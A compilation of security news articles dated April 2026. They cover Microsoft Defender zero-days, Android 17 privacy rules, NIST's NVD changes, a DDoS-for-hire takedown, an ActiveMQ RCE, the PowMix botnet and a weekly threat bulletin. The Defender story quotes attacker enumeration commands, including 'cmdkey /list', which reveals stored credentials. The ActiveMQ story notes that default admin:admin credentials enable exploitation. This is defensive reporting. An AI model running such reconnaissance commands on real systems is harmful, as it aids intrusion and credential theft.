2026-04-18 AI创业新闻

Three Microsoft Defender Zero-Days Actively Exploited; Two Still Unpatched

Huntress is warning that threat actors are exploiting three recently disclosed security flaws in Microsoft Defender to gain elevated privileges in compromised systems. The activity involves the exploitation of three vulnerabilities that are codenamed BlueHammer (requires GitHub sign-in), RedSun , and UnDefend , all of which were released as zero-days by a researcher known as Chaotic Eclipse (aka Nightmare-Eclipse) in response to Microsoft’s handling of the vulnerability disclosure process. While both BlueHammer and RedSun are local privilege escalation (LPE) flaws impacting Microsoft Defender, UnDefend can be used to trigger a denial-of-service (DoS) condition and effectively block definition updates. Microsoft moved to address BlueHammer as part of its Patch Tuesday updates released earlier this week.

The vulnerability is being tracked under the CVE identifier CVE-2026-33825 . However, the other flaws do not have a fix as of writing. In a series of posts shared on X, Huntress said it observed all three flaws being exploited in the wild, with BlueHammer being weaponized since April 10, 2026, followed by the use of RedSun and UnDefend proof-of-concept (PoC) exploits on April 16. “These invocations followed after typical enumeration commands: whoami /priv, cmdkey /list, net group, and others that indicate hands-on-keyboard threat actor activity,” it added.

The cybersecurity vendor said it has taken steps to isolate the affected organization to prevent further post-exploitation. When reached for comment, Microsoft confirmed that the BlueHammer exploit has been addressed via CVE-2026-33825 . “Microsoft has a customer commitment to investigate reported security issues and update impacted devices to protect customers as soon as possible,” the spokespersons said. “We also support coordinated vulnerability disclosure, a widely adopted industry practice that helps ensure issues are carefully investigated and addressed before public disclosure, supporting both customer protection and the security research community.” (The story was updated after publication to include a response from Microsoft.) Found this article interesting?

Google Blocks 8.3B Policy-Violating Ads in 2025, Launches Android 17 Privacy Overhaul

Google this week announced a new set of Play policy updates to strengthen user privacy and protect businesses against fraud, even as it revealed it blocked or removed over 8.3 billion ads globally and suspended 24.9 million accounts in 2025. The new policy updates relate to contact and location permissions in Android, allowing third-party apps to access the contact lists and a user’s location in a more privacy-friendly manner. This includes a new Contact Picker, which offers a standardized, secure, and searchable interface for contact selection. “This feature allows users to grant apps access only to the specific contacts they choose, aligning with Android’s commitment to data transparency and minimized permission footprints,” Google said .

Previously, apps requiring access to a specific user’s contacts relied on READ_CONTACTS, an overly broad permission that granted apps the ability to access all contacts and their associated information. With the latest change introduced in Android 17, apps can specify which fields from a contact they need, such as phone numbers or email addresses, as opposed to reading the entire record. The updated policy will require all applicable apps to use the picker (or the Android Sharesheet ) as the main way to access users’ contacts, with READ_CONTACTS now reserved only for apps that can’t function without it. It’s advised to entirely remove the READ_CONTACTS permission from the app manifest declaration if it’s targeting Android versions 17 (currently in beta) and later.

“If your app requires full, ongoing access to a user’s contact list to function, you must justify this need by submitting a Play Developer Declaration in the Play Console,” Google noted. The second policy change revolves around a streamlined location button that Google has introduced in Android 17 that enables apps to request one-time access to a user’s precise location. In doing so, it allows the user to make a better choice about how much information they want to share and for what duration. What’s more, a persistent indicator will appear to alert a user every time a non-system app accesses their location.

To comply with this update, developers are being urged to review their apps’ location usage to ensure that they are requesting the minimum amount of location data necessary for them to function. “If your app targets Android 17 and above and uses precise location for discrete, temporary actions, implement the location button by adding the onlyForLocationButton flag in your manifest,” the tech giant said. “If your app requires persistent, precise location to function, you will need to submit a Play Developer Declaration in Play Console to show why the new button or coarse location isn’t sufficient for your app’s core features.” The declaration form is expected to be available before October 2026, with pre-review checks in the Play Console to go live starting October 27 to identify potential contacts or location permissions policy issues. Google is also implementing a secure way for businesses to transfer ownership of their apps through a native account transfer feature built into Play Console so as to stay protected against fraud.

The company is recommending that app developers handle account ownership changes through this feature starting May 27, 2026. “That means that unofficial transfers (like sharing login credentials or buying and selling accounts on third-party marketplaces), which leave your business vulnerable, are not permitted,” it said. Google Takes Aim at Malvertising The changes to the Android ecosystem come as Google said it’s harnessing the capabilities of Gemini, its artificial intelligence (AI) model, to detect and block malicious ads on its platform. More than 99% of policy-violating ads were caught by its systems in 2025 before they were shown to users, it noted.

“Unlike earlier keyword-based systems, our latest models better understand intent, helping us spot malicious content and preemptively block it, even when it’s designed to evade detection,” Keerat Sharma, vice president and general manager of Ads Privacy and Safety at Google, said in a post shared with The Hacker News. Taken together, the company removed or blocked 602 million ads and 4 million accounts that were associated with scams or scam-related activity last year. More than 4.8 billion ads were restricted, and over 480 million web pages were actioned for attempting to serve sexually explicit content, weapons promotion, online gambling, alcohol, tobacco, and malware. In contrast, Google suspended over 39.2 million advertiser accounts in 2024, and stopped 5.1 billion bad ads, restricted 9.1 billion ads, and blocked or restricted ads on 1.3 billion pages.

“Bad actors are using generative AI to create deceptive ads at scale, and Gemini helps us detect and block them in real time,” Google said. “By the end of last year, the majority of Responsive Search Ads created in Google Ads were reviewed instantly, and harmful content was blocked at submission – a capability we plan to bring to more ad formats this year.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

NIST Limits CVE Enrichment After 263% Surge in Vulnerability Submissions

The National Institute of Standards and Technology (NIST) has announced changes to the way it handles cybersecurity vulnerabilities and exposures (CVEs) listed in its National Vulnerability Database (NVD), stating it will only enrich those that fulfil certain conditions owing to an explosion in CVE submissions. “CVEs that do not meet those criteria will still be listed in the NVD but will not automatically be enriched by NIST ,” it said . “This change is driven by a surge in CVE submissions, which increased 263% between 2020 and 2025. We don’t expect this trend to let up anytime soon.” The prioritization criteria outlined by NIST, which went into effect on April 15, 2026, are as follows - CVEs appearing in the U.S.

Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) catalog. CVEs for software used within the federal government. CVEs for critical software as defined by Executive Order 14028: this includes software that’s designed to run with elevated privilege or managed privileges, has privileged access to networking or computing resources, controls access to data or operational technology, and operates outside of normal trust boundaries with elevated access. Any CVE submission that doesn’t meet these thresholds will be marked as “Not Scheduled.” The idea, NIST said, is to focus on CVEs that have the maximum potential for widespread impact.

“While CVEs that do not meet these criteria may have a significant impact on affected systems, they generally do not present the same level of systemic risk as those in the prioritized categories,” it added. NIST said the CVE submissions during the first three months of 2026 are nearly one-third higher than they were last year, and it’s working faster than ever to enrich the submissions. It also said it enriched nearly 42,000 CVEs in 2025, which was 45% more than any prior year. In cases where a high-impact CVE has been categorized as unscheduled, users have the option to request enrichment by sending an email to “nvd@nist[.]gov.” NIST is expected to review those requests and schedule the CVEs for enrichment as applicable.

Changes have also been instituted for various other aspects of the NVD operations. These include - NIST will no longer routinely provide a separate severity score for a CVE where the CVE Numbering Authority has already provided a severity score. A modified CVE will be reanalyzed only if it “materially impacts” the enrichment data. Users can request specific CVEs to be reanalyzed by sending an email to the same address listed above.

All unenriched CVEs currently in backlog with an NVD publish date earlier than March 1, 2026, will be moved into the “Not Scheduled” category. This does not apply to CVEs that are already in the KEV catalog. NIST has updated the CVE status labels and descriptions , as well as the NVD Dashboard , to accurately reflect the status of all CVEs and other statistics in real time. “The announcement from NIST doesn’t come as a major surprise, given they’ve previously telegraphed intent to move to a ‘risk-based’ prioritization model for CVE enrichment,” Caitlin Condon, vice president of security research at VulnCheck, said in a statement shared with The Hacker News.

“On the plus side, NIST is clearly and publicly setting expectations for the community amid a huge and escalating rise in new vulnerabilities. On the other hand, a significant portion of vulnerabilities now appear to have no clear path to enrichment for organizations relying on NIST as their authoritative (or only) source of CVE enrichment data.” Data from the cybersecurity company shows that there are still approximately 10,000 vulnerabilities from 2025 without a CVSS score. NIST is estimated to have enriched 14,000 ‘CVE-2025’ vulnerabilities, accounting for about 32% of the 2025 CVE population. “This announcement underscores what we already know: We no longer live in a world where manual enrichment of new vulnerabilities is a feasible or effective strategy,” Condon said.

“Even without AI-driven vulnerability discovery accelerating CVE volume and validation challenges, today’s threat climate unequivocally demands distributed, machine-speed approaches to vulnerability identification and enrichment, along with a genuinely global perspective on risk that acknowledges the interconnected, interdependent nature of the worldwide software ecosystem – and the attackers who target it. After all, what we don’t prioritize for ourselves, adversaries will prioritize for us.” David Lindner, chief information security officer of Contrast Security, said NIST’s decision to only prioritize high-impact vulnerabilities marks the end of an era where defenders could leverage a single government-managed database to assess security risks, forcing organizations to pivot to a proactive approach to risk management that’s driven by threat intelligence. “Modern defenders must move beyond the noise of total CVE volume and instead focus their limited resources on the CISA KEV list and exploitability metrics,” Lindner said. “While this transition may disrupt legacy auditing workflows, it ultimately matures the industry by demanding that we prioritize actual exposure over theoretical severity.

Relying on a curated subset of actionable data is far more effective for national resilience than maintaining a comprehensive but unmanageable archive of every minor bug.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Operation PowerOFF Seizes 53 DDoS Domains, Exposes 3 Million Criminal Accounts

An international law enforcement operation has taken down 53 domains and arrested four people in connection with commercial distributed denial-of-service (DDoS) operations that were used by more than 75,000 cybercriminals. The ongoing effort, dubbed Operation PowerOFF , disrupted access to the DDoS-for-hire services, took down the technical infrastructure supporting them, and obtained access to databases containing over 3 million criminal user accounts. Authorities are also sending warning emails and letters to the identified criminal users, and 25 search warrants have been issued. As many as 21 countries participated in the action: Australia, Austria, Belgium, Brazil, Bulgaria, Denmark, Estonia, Finland, Germany, Japan, Latvia, Lithuania, Luxembourg, the Netherlands, Poland, Portugal, Sweden, Thailand, the U.K., and the U.S.

“Booter services allow users to launch DDoS attacks against targeted websites, servers, or networks,” Europol said in a statement. “Their infrastructure is made up of servers, databases, and other technical components that make DDoS-for-hire activities possible. By seizing these infrastructures, authorities were able to hinder these criminal operations and prevent further damage to victims.” The agency described DDoS-for-hire as one of the most prolific and easily accessible trends in cybercrime, as it allows even individuals with little to no technical knowledge to execute malicious attacks at scale and inflict significant damage to busin Europol also noted that DDoS activity can originate from well-resourced and skilled threat actors, who could rely on such services to customize or optimize their illicit activities. DDoS attacks often tend to target various web-based services, with the motivations behind them as varied as they are broad.

This ranges from simple curiosity and financial gain through extortion to hacktivism driven by ideological reasons and disruption of competitors’ services. Some operators of these services have been found to mask their true motives and escape law enforcement scrutiny by disguising them as stress-testing tools. The development marks the latest step taken by authorities to dismantle criminal DDoS-for-hire infrastructures worldwide as part of PowerOFF. In August 2025, the U.S.

government announced the takedown of a DDoS botnet called RapperBot that was used to conduct large-scale disruptive attacks targeting victims in over 80 countries since at least 2021. U.S. Authorities Disrupt DDoS IoT Botnet Services In a parallel announcement, the U.S. Department of Justice (DoJ) said court-authorized actions were undertaken to disrupt some of the world’s leading DDoS Internet of Things (IoT) botnet services as part of its ongoing commitment to hold DDoS botnet administrators responsible and seize websites that allow paying users to launch potent DDoS attacks.

These attacks are designed to inundate websites, servers, and networks with junk traffic, degrading access to legitimate services, causing performance bottlenecks and, in some cases, rendering them completely offline. The DoJ said U.S. authorities seized services associated with eight DDoS-for-hire domains, including Vac Stresser and Mythical Stress , both of which claimed to launch thousands of DDoS attacks per day. It also said an advertising campaign has been launched to deter potential cybercriminals searching for DDoS services in the U.S.

and elsewhere and to alert the public about the illegality of DDoS attacks. The names of the domains associated with the booter services are listed below - vacstresser[.]net mythicalstress[.]com Visitors to the sites are now greeted by a seizure banner that reads: “DDoS attacks are illegal. For years law enforcement agencies around the world have seized booter databases, arrested administrators, and collected information relating to the operation of these services, including information on the customers of these services. Anyone operating or utilizing DDoS services is subject to investigation, prosecution, and other law enforcement action.” Found this article interesting?

Apache ActiveMQ CVE-2026-34197 Added to CISA KEV Amid Active Exploitation

A recently disclosed high-severity security flaw in Apache ActiveMQ Classic has come under active exploitation in the wild, per the U.S. Cybersecurity and Infrastructure Security Agency (CISA). To that end, the agency has added the vulnerability, tracked as CVE-2026-34197 (CVSS score: 8.8), to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by April 30, 2026. CVE-2026-34197 has been described as a case of improper input validation that could lead to code injection, effectively allowing an attacker to execute arbitrary code on susceptible installations.

According to Horizon3.ai’s Naveen Sunkavally, CVE-2026-34197 has been ”hiding in plain sight” for 13 years. “An attacker can invoke a management operation through ActiveMQ’s Jolokia API to trick the broker into fetching a remote configuration file and running arbitrary OS commands,” Sunkavally added. “The vulnerability requires credentials, but default credentials (admin:admin) are common in many environments. On some versions (6.0.0–6.1.1), no credentials are required at all due to another vulnerability, CVE-2024-32114, which inadvertently exposes the Jolokia API without authentication.

In those versions, CVE-2026-34197 is effectively an unauthenticated RCE.” The vulnerability impacts the following versions - Apache ActiveMQ Broker (org.apache.activemq:activemq-broker) before 5.19.4 Apache ActiveMQ Broker (org.apache.activemq:activemq-broker) 6.0.0 before 6.2.3 Apache ActiveMQ (org.apache.activemq:activemq-all) before 5.19.4 Apache ActiveMQ (org.apache.activemq:activemq-all) 6.0.0 before 6.2.3 Users are advised to upgrade to version 5.19.4 or 6.2.3, which addresses the issue. There are currently no details on how CVE-2026-34197 is being exploited in the wild, but SAFE Security, in a report published this week, revealed that threat actors are actively targeting exposed Jolokia management endpoints in Apache ActiveMQ Classic deployments. Telemetry data gathered by Fortinet FortiGuard Labs has also uncovered dozens of exploitation attempts over the past couple of days, with the activity peaking on April 14, 2026. The findings once again demonstrate that exploitation timelines continue to collapse as attackers pounce upon newly disclosed vulnerabilities at an alarmingly faster rate and breach systems before they can be patched.

Apache ActiveMQ is a popular target for attack , with flaws in the open-source message broker repeatedly exploited in various malware campaigns since 2021. In August 2025, a critical vulnerability in ActiveMQ (CVE-2023-46604, CVSS score: 10.0) was weaponized by unknown actors to drop a Linux malware called DripDropper. “Given ActiveMQ’s role in enterprise messaging and data pipelines, exposed management interfaces present a high-impact risk, potentially enabling data exfiltration, service disruption, or lateral movement,” SAFE Security said . “Organizations should audit all deployments for externally accessible Jolokia endpoints, restrict access to trusted networks, enforce strong authentication, and disable Jolokia where it is not required.” Found this article interesting?

Newly Discovered PowMix Botnet Hits Czech Workers Using Randomized C2 Traffic

Cybersecurity researchers have warned of an active malicious campaign that’s targeting the workforce in the Czech Republic with a previously undocumented botnet dubbed PowMix since at least December 2025. “PowMix employs randomized command-and-control (C2) beaconing intervals, rather than persistent connection to the C2 server, to evade the network signature detections,” Cisco Talos researcher Chetan Raghuprasad said in a report published today. “PowMix embeds the encrypted heartbeat data along with unique identifiers of the victim machine into the C2 URL paths, mimicking legitimate REST API URLs. PowMix has the capability to remotely update the new C2 domain to the botnet configuration file dynamically.” The attack chain begins with a malicious ZIP file, likely delivered via a phishing email, to activate a multi-stage infection chain that drops PowMix.

Specifically, it involves a Windows Shortcut (LNK) that’s used to launch a PowerShell loader, which then extracts the malware embedded within the archive, decrypts it, and runs it in memory. The never-before-seen botnet is designed to facilitate remote access, reconnaissance, and remote code execution, while establishing persistence by means of a scheduled task. At the same time, it verifies the process tree to ensure that another instance of the same malware is not running on the compromised host. PowMix’s remote management logic allows it to process two different kinds of commands sent from the C2 server.

Any non #-prefixed response causes PowMix to shift to arbitrary execution mode, and decrypt and run the obtained payload. #KILL, to initiate a self-deletion routine and wipe traces of all malicious artifacts #HOST, to enable C2 migration to a new server URL. In parallel, it also opens a decoy document with compliance-themed lures as a distraction mechanism. The lure documents reference legitimate brands like Edeka and include compensation data and valid legislative references, potentially in an effort to enhance their credibility and trick recipients, like job aspirants.

Talos said the campaign shares some level of tactical overlap with a campaign dubbed ZipLine that was disclosed by Check Point in late August 2025 as targeting supply chain-critical manufacturing companies with an in-memory malware called MixShell. This includes the use of the same ZIP-based payload delivery, scheduled task persistence, and the abuse of Heroku for C2. That said, no final payloads have been observed beyond the botnet malware itself, leaving questions about its exact motives unanswered. “PowMix avoids persistent connections to the C2 server,” Talos said.

“Instead, it implements a jitter via the Get-Random PowerShell command to vary the beaconing intervals initially between 0 and 261 seconds, and subsequently between 1,075 and 1,450 seconds. This technique attempts to prevent detection of C2 traffic through predictable network signatures.” The disclosure comes as Bitsight sheds light on the infection chain associated with the RondoDox botnet, highlighting the malware’s evolving capabilities to illicitly mine cryptocurrency on infected systems using XMRig on top of the existing distributed denial-of-service (DDoS) attack functionality. The findings paint the picture of an actively maintained malware that offers improved evasion, better resilience, aggressive competition removal, and an expanded feature set. RondoDox is capable of exploiting over 170 known vulnerabilities in various internet-facing applications to obtain initial access and drop a shell script that performs basic anti-analysis and removes competing malware before dropping the appropriate botnet binary for the architecture.

The malware “does multiple checks and implements techniques to hinder analysis, which include the usage of nanomites, renaming/removing files, killing processes, and actively checking for debuggers during execution,” Bitsight Principal Research Scientist João Godinho said . “The bot is able to run DoS attacks at the internet, transport and application layer, depending on the command and arguments issued by the C2.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

ThreatsDay Bulletin: Defender 0-Day, SonicWall Brute-Force, 17-Year-Old Excel RCE and 15 More Stories

You know that feeling when you open your feed on a Thursday morning and it’s just… a lot? Yeah. This week delivered.

We’ve got hackers getting creative in ways that are almost impressive if you ignore the whole “crime” part, ancient vulnerabilities somehow still ruining people’s days, and enough supply chain drama to fill a season of television nobody asked for. Not all bad though. Some threat actors got exposed with receipts, a few platforms finally tightened things up, and there’s research in here that’s genuinely worth your time. Grab your coffee and keep scrolling.

Targeted wallet breach Zerion Hack Likely Linked to North Korea Cryptocurrency wallet service Zerion has disclosed that one of its team member’s devices was compromised, resulting in the theft of approximately $100K in stolen funds from internal company hot wallets. The company noted that user funds, Zerion apps, or infrastructure were not impacted by the breach. The team member is said to have been the target of an artificial intelligence (AI)-enabled social engineering attack carried by a North Korean threat actor tracked as UNC1069 . The hacking group was recently attributed to the poisoning of the popular Axios npm package.

“This allowed the attacker to gain access to some of the team members’ logged-in sessions and credentials as well as private keys to company hot wallets used for testing and internal purposes,” Zerion said. “This was not an opportunistic attack. The actor is clearly sophisticated and well-resourced. They planned the attack thoroughly.” Anonymous age checks E.U.

Plans Bloc-Wide Age Verification App The European Union has announced that it will soon roll out a new online age verification app to allow users to prove their age when accessing online platforms. Users can set it up by downloading the app on their Android or iOS device using a passport or ID card. The Commission has emphasized that the app will respect users’ privacy. “Users will prove their age without revealing any other personal information,” President of the European Commission, Ursula von der Leyen, said .

“Put simply, it is completely anonymous: users cannot be tracked. Third, the app works on any device – phone, tablet, computer, you name it. And, finally, it is fully open source – everyone can check the code.” The development comes as countries around the world are undertaking various stages of regulatory action to keep cyberspace a safer place for children and minors and protect them from serious harm. New Defender zero-day BlueHammer Author Releases RedSun Exploit A researcher using the alias “Chaotic Eclipse” released a zero-day exploit called BlueHammer earlier this month following Microsoft’s handling of the vulnerability disclosure process.

Although the issue appears to have been fixed as of this month’s Patch Tuesday release (CVE-2026-33825), the researcher has since disclosed a new unpatched Microsoft Defender privilege escalation vulnerability . The exploit has been codenamed RedSun . “This works 100% reliably to go from unprivileged user to SYSTEM against Windows 11 and Windows Server with April 2026 updates, as well as Windows 10, as long as you have Windows Defender enabled,” security researcher Will Dormann said. A third exploit released by “Chaotic Eclipse,” referred to as UnDefend, also targets Defender and triggers a denial-of-service (DoS) condition.

“This tool, while stupid, is quite dangerous [be]cause if paired with BlueHammer, your machine is basically a hole, anyone can run anything with administrator privileges andwindows defender can’t really do much about it,” the researcher said . “Considering that’s the whole purpose of an antivirus, you’re better off removing it LOL.” Legacy Excel RCE active 17-Year-Old Critical Excel flaw Under Exploit The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added an old remote code execution vulnerability impacting Microsoft Office to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the shortcoming by April 28, 2026. The vulnerability in question is CVE-2009-0238, which has a CVSS score of 8.8.

“Microsoft Office Excel contains a remote code execution vulnerability that could allow an attacker to take complete control of an affected system if a user opens a specially crafted Excel file that includes a malformed object,” CISA said . sudo now requires password Raspberry Pi Disables Passwordless sudo Raspberry Pi has released version 6.2 of its Raspberry Pi OS, which introduces one significant change: it disables passwordless sudo by default. As a result, users who run a sudo command for administrator-level access will be prompted to enter the current user’s password. The change affects only new installations; existing setups are untouched.

“Given the ever-increasing threat of cybercrime, we continually review the security of Raspberry Pi OS to ensure it is sufficiently robust to withstand potential attacks,” Raspberry Pi said . “This is always a tricky balance, as anything that makes the operating system more secure will invariably inconvenience legitimate users to some extent, so we try to keep such changes to a minimum. This particular security update is one that many users may not even notice, but it will affect some.” Stealth C2 frameworks uncovered ObsidianStrike and ArchangelC2 Frameworks Discovered A previously undocumented command-and-control (C2) framework dubbed ObsidianStrike has been deployed on infrastructure belonging to a Brazilian law firm. “Only two instances of ObsidianStrike exist on the entire internet,” Breakglass Intelligence said .

“The framework has zero presence on GitHub, zero samples on VirusTotal or MalwareBazaar, and near-zero vendor detection. This is a fully private, Portuguese-language C2 built for targeted Windows operations, hidden behind a victim organization’s domain.” Also discovered by the security vendor is ArchangelC2 , a C2 panel behind an industrial-scale ScreenConnect remote-access fraud campaign that has been operational since November 2024. Fake app drains $9.5M Apple Removes Fake Ledger App A fake Ledger app managed to slip onto the Apple App Store, draining $9.5 million in cryptocurrency from more than 50 victims between April 7 and April 13, 2026. The app, named Ledger Live , was released by a developer, “SAS Software Company,” and published under “Leva Heal Limited.” Users who downloaded the fraudulent app were tricked into entering their seed phrases, giving attackers full access to their wallets and allowing them to send digital assets to external addresses under their control.

While Apple has since removed the macOS app from the store, questions remain as to how it managed to pass the company’s review process. In more Apple-related news, the company has also removed a data harvesting app called Freecash from its App Store after it was deceptively advertised as a way to “make money just by scrolling TikTok,” while collecting sensitive information from users. This included details about a user’s race, religion, sex life, sexual orientation, health, and other biometrics. Once installed, however, instead of the promised functionality, users were routed to a roster of mobile games where they are offered cash rewards for completing time-limited in-game challenges.

The app continues to be available on the Google Play Store. Localized ransomware campaign Turkey Targeted by JanaWare Ransomware Cybercriminals are using a new ransomware strain called JanaWare to target people in Turkey, according to Acronis. The attack leverages phishing emails containing a Google Drive link that paves the way for the download and subsequent execution of a malicious JAR file via javaw.exe. The payload is a customized Adwind (aka AlienSpy, jRAT, or Sockrat) variant with polymorphic characteristics that’s used to deliver the ransomware module.

The malware implements geofencing and environment filtering to ensure that the compromised systems match the Turkish language and region. While none of these tricks are particularly novel or advanced, they continue to work against unprotected small targets. It’s unclear how many people or businesses might have fallen prey to the scheme. The low-stakes, localized approach has allowed the campaign to persist since at least 2020 without any major disruption.

“Victimology appears to primarily include home users and small to medium-sized businesses. Initial access is assessed to occur via phishing emails delivering malicious Java archives,” the company said . “Ransom demands observed in analyzed samples range from $200–$400, consistent with a low-value, high-volume monetization approach.” Crackdown on navigation abuse Google Takes Aim at Back Button Hijacking Google said it’s introducing a new spam policy for “back button hijacking,” which occurs when a site interferes with a user’s browser navigation and prevents them from using their back button to immediately get back to the page they came from. Instead, the hijack could redirect users to sketchy sites or other pages they have never visited before.

“Back button hijacking interferes with the browser’s functionality, breaks the expected user journey, and results in user frustration,” Google said . “Pages that are engaging in back button hijacking may be subject to manual spam actions or automated demotions, which can impact the site’s performance in Google Search results. To give site owners time to make any needed changes, we’re publishing this policy two months in advance of enforcement on June 15, 2026.” Stealth cloud credential theft APT41 Uses New Credential Stealer The China-linked hacking group known as APT41 has been attributed to an undetectable, purpose-built ELF backdoor targeting Linux cloud workloads across Amazon Web Services (AWS), Google Cloud, Microsoft Azure, and Alibaba Cloud environments. “The implant uses SMTP port 25 as a covert command-and-control channel, harvests cloud provider credentials and metadata, and phones home to three Alibaba-themed typosquat domains hosted on Alibaba Cloud infrastructure in Singapore,” Breakglass Intelligence said .

“A selective C2 handshake validation mechanism renders the server invisible to conventional scanning tools like Shodan and Censys.” RDP phishing hardening Microsoft Debuts New Protections Against Malicious RDP Files Starting with the April 2026 security update ( CVE-2026-26151 ), Microsoft has introduced new Windows protections to defend against phishing attacks that abuse Remote Desktop connection (RDP) files, adding security warnings and turning off redirections by default. “Malicious actors misuse this capability by sending RDP files through phishing emails,” Microsoft said . “When a victim opens the file, their device silently connects to a server controlled by the attacker and shares local resources, giving the attacker access to files, credentials, and more.” Russian hacking groups like APT29 have weaponized RDP configuration files to target Ukrainian government agencies, enterprises, and military entities in the past. Plugin supply chain breach WordPress Plugin Suite Poisoned After Acquisition to Push Malware Unknown threat actors have staged a supply chain attack on a WordPress plug-in maker called Essential Plugin (formerly WP Online Support) after acquiring it in early 2025 from the original developers in a six-figure deal to plant a backdoor in August and subsequently weaponize it early this month to distribute malicious payloads to any website with the plug-ins installed.

WordPress has since permanently closed all the plugins. “The plugin’s wpos-analytics module had phoned home to analytics.essentialplugin.com, downloaded a backdoor file called wp-comments-posts.php (designed to look like the core file wp-comments-post.php), and used it to inject a massive block of PHP into wp-config.php,” Anchor Hosting said . “The injected code was sophisticated. It fetched spam links, redirects, and fake pages from a command-and-control server.

It only showed the spam to Googlebot, making it invisible to site owners.” In addition, it resolved the command-and-control (C2) domain through an Ethereum smart contract to make it resilient to takedown efforts. Prior to their removal, the plugins collectively had more than 180,000 installs. “This is a classical case of supply chain compromise that happened because the original vendor sold their plugins to a third-party, which turned out to be a malicious threat actor,” Patchstack said . Sanctioned crypto market persists Xinbi Guarantee Continues to Operate on Telegram Telegram has continued to host Xinbi Guarantee, an illicit marketplace that has processed over $21 billion in total transaction volume, despite sanctions issued by the U.K.

last month. The development has raised questions about the platform’s willingness to police its own ecosystem and suspend bad actors. The Chinese-language bazaar is known to offer money laundering solutions to cryptocurrency scammers, harassment services, and products like electrified batons and tasers that cater to investment scams operating out of Southeast Asia. “Xinbi is still going strong,” Elliptic’s cofounder and chief scientist, Tom Robinson, told WIRED.

“They’re on track to become the largest market of this kind that has ever existed.” Malvertising leads to ransomware SmokedHam Backdoor Leads to Qilin Ransomware Orange Cyberdefense has revealed that threat actors used malvertising in three separate incidents observed between early February and early April 2026 to deliver the SmokedHam (aka Parcel RAT, SharpRhino, and WorkersDevBackdoor) backdoor by masquerading it as installers for RVTools or Remote Desktop Manager (RDM). The malware is assessed to be a modified version of the open-source trojan known as ThunderShell. In at least one case, the attack led to the deployment of Qilin ransomware, but not before dropping employee monitoring and remote desktop solutions like Controlio, TeraMind, and Zoho Assist for persistent access, exfiltrating KeePass password databases, and conducting discovery and lateral movement. The adoption of legitimate dual-use tools is a concerning trend as it allows attackers to blend their actions into legitimate activity and reduce the risk of detection.

The activity has been attributed with medium confidence to UNC2465 , an affiliate of DarkSide, LockBit, and Hunters International. It also overlaps with a campaign detailed by Synacktiv and Field Effect in early 2025. APT lineage link uncovered Water Hydra Remains Active in 2026 New research has discovered that the threat actor known as Water Hydra (aka DarkCasino) is still active in 2026, with new evidence uncovering a previously unreported connection between evilgrou-tech, a commodity operator, and the hacking group. “The handle ‘evilgrou’ is assessed with moderate confidence to be a deliberate reference to EvilNum (Evil + [num -> grou]p), the predecessor APT group from which WaterHydra/DarkCasino splintered in late 2022,” Breakglass Intelligence said .

The strongest attribution indicator is a shared developer workspace path embedded in binaries associated with EvilNum and Water Hydra: “C:\Users\Administrator\Desktop\vaeeva\shellrundll.tlb.” These two artifacts are separated by two years, one in July 2022 and the other in January 2024. Scientific software RCE risk Security Flaws in HDF5 Software Cybersecurity researchers have disclosed security flaws in HDF5 software, a file format to manage, process, and store heterogeneous data, that could be exploited to compromise a vulnerable system. “The discovered vulnerabilities, based on a stack buffer overflow, could allow threat actors to overwrite memory and compromise target systems for stealing highly classified research data, industrial espionage, or a foothold into the internal network,” ThreatLeap’s co-founder, Leon Juranic, said. “In practice, this means the vulnerability could be exploited by a single specially crafted malicious input file and, as a result, an entire system could get compromised.” The issues were addressed in October 2025 following responsible disclosure.

Brute-force surge on edge devices Surge in Brute-Force Attacks Targeting SonicWall and FortiGate Devices Security researchers have detected a “sharp rise” in brute-force attempts to hijack SonicWall and FortiGate devices between January and March 2026, with the vast majority (88%) appearing to originate from the Middle East. Most attempts were unsuccessful, either blocked outright by security tools or directed at invalid usernames. “Attackers are aggressively scanning and testing perimeter devices for weak or exposed credentials,” Barracuda Networks said . “Even when attacks fail, persistent probing raises the risk that a single weak password or misconfiguration could lead to compromise.” Fraud network evades sanctions Triad Nexus Uses Front Companies to Avoid Sanctions Triad Nexus, a sprawling cybercrime ecosystem acting as the backbone of scams, money laundering, and illicit gambling operations since at least 2020, has been observed using geographic fencing and laundering its infrastructure through “clean” front companies to acquire accounts at major enterprise cloud providers (Amazon, Cloudflare, Google, and Microsoft) in an attempt to distance itself from Funnull , a Philippines-based company that was sanctioned by the U.S.

last year. Simultaneously, the group has expanded into the Spanish, Vietnamese, and Indonesian markets using localized templates to target these regions. Besides engaging in fraud, the group specializes in high-fidelity brand impersonation, weaponizing the digital identities of Global 2000 companies to dupe victims. “The network has industrialized brand theft on a global scale; its catalog includes ‘pixel-perfect’ clones of everything from high-end luxury goods to public services,” Silent Push said .

“Despite federal sanctions in 2025, the group has reinstated its global fraud engine, shifting its focus toward emerging markets while maintaining a persistent threat to Western enterprise assets.” Triad Nexus is estimated to be responsible for over $200 million in reported losses, primarily fueled by pig butchering and virtual currency scams. That’s a wrap for this week. If anything here made you pause, good. Go check your patches, side-eye your dependencies, and maybe don’t trust that app just because it’s sitting in an official store.

The basics still matter more than most people want to admit. We’ll be back next Thursday with whatever fresh chaos the internet cooks up. Until then, stay sharp and keep your logs close. See you on the other side.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

[Webinar] Find and Eliminate Orphaned Non-Human Identities in Your Environment

In 2024, compromised service accounts and forgotten API keys were behind 68% of cloud breaches. Not phishing. Not weak passwords. Unmanaged non-human identities that nobody was watching.

For every employee in your org, there are 40 to 50 automated credentials: service accounts, API tokens, AI agent connections, andOAuth grants. When projects end or employees leave, most of these stay active. Fully privileged. Completely unmonitored.

Attackers don’t need to break in. They just pick up the keys you left out. Join our upcoming webinar where we’ll show you how to find and eliminate these “Ghost Identities” before they become a back door for hackers. AI agents and automated workflows are multiplying these credentials at a pace security teams can’t manually track.

Many carry admin-level access they never needed. One compromised token can give an attacker lateral movement across your entire environment, and the average dwell time for these intrusions is over 200 days. Traditional IAM wasn’t built for this. It manages people.

